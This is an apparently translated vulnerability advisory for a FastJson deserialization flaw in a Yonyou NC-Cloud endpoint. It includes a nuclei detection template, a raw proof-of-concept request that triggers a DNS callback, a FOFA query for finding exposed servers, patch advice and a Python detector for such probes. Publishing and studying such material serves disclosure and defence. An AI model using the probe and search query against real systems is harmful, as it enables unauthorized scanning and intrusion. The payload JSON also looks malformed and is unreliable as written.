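Vulnerability description:
A FastJson deserialization vulnerability exists in the /ncchr/pm/ref/indiIssued/blobRefClassSearch interface of Yonyou NC-Cloud. An attacker can craft malicious JSON data to execute arbitrary code on the server and thereby take control of the entire server system.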
id: yongyou-NC-cloud-blobRefClassSearch-FastJson-RCE

info:
  name: 用友NC-Cloud blobRefClassSea接口处存在FastJson反序列化漏洞
  author: kingkong
  severity: high
  metadata:
    fofa-query: app="用友-NC-Cloud"

http:
  - raw:
      - |
        POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Connection: close
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

        {"clientParam":"{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"{{interactsh-url}}"}}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
FOFA: app="用友-NC-Cloud"
The interface is shown below.
Vulnerability detection PoC
POST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1
Content-Type: application/json
Host:
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Length: 111

{"clientParam":"{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"{{interactsh-url}}"}}}"}
Screenshot of nuclei batch detection
Update the current system or software to the latest version.
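Until the update is applied, defenders can look for the probe request shown above in captured traffic. The following is an added example, not part of the original article: it flags POSTs to the endpoint whose body carries a FastJson `@type` key, after decoding escapes. The record format (method, request target, body), the function names and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

ENDPOINT = "/ncchr/pm/ref/indiIssued/blobRefClassSearch"  # path from the article
AT_TYPE = re.compile(r"""@type["']?\s*:""")               # FastJson autotype key

def normalize_body(body: str) -> str:
    """Decode \\uXXXX / \\xXX escapes and drop backslashes, so the marker is
    found inside a nested JSON string or when written with escapes."""
    body = re.sub(r"\\+u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), body)
    body = re.sub(r"\\+x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), body)
    return body.replace("\\", "")

def normalize_path(target: str) -> str:
    """Strip query string, percent-encoding, ;path-params and repeated slashes."""
    path = unquote(target.split("?", 1)[0])
    path = re.sub(r";[^/]*", "", path)
    return re.sub(r"/{2,}", "/", path).rstrip("/")

def classify(method: str, target: str, body: str) -> str:
    """Label one request: probe, endpoint-hit, autotype-elsewhere or clean."""
    on_endpoint = method.upper() == "POST" and normalize_path(target) == ENDPOINT
    has_marker = bool(AT_TYPE.search(normalize_body(body)))
    if on_endpoint:
        return "probe" if has_marker else "endpoint-hit"
    return "autotype-elsewhere" if has_marker else "clean"

# Constructed sample records (method, request target, body); not real traffic.
SAMPLE = [
    ("POST", ENDPOINT,
     r'{"clientParam":"{\"x\":{\"@type\":\"java.net.InetSocketAddress\"'
     r'{\"address\":,\"val\":\"probe.example.invalid\"}}}"}'),
    ("POST", ENDPOINT + ";v=1?t=2", r'{"clientParam":"{\"\\u0040type\":\"placeholder\"}"}'),
    ("POST", ENDPOINT, r'{"clientParam":"{\"name\":\"abc\"}"}'),
    ("POST", "/api/other", '{"@type": "placeholder"}'),
    ("GET", "/index.html", ""),
]

def scan(records):
    """Return (index, verdict) for every record that is not clean."""
    return [(i, v) for i, r in enumerate(records) if (v := classify(*r)) != "clean"]

if __name__ == "__main__":
    for idx, verdict in scan(SAMPLE):
        print(idx, verdict, SAMPLE[idx][1])
```

An "endpoint-hit" verdict only records that the interface was reached and may be legitimate application traffic; "probe" and "autotype-elsewhere" are the ones to triage first.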
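Originally published on the WeChat official account 脚本小子: FastJson deserialization vulnerability in the Yonyou NC-Cloud blobRefClassSearch interface [vulnerability reproduction | nuclei PoC included]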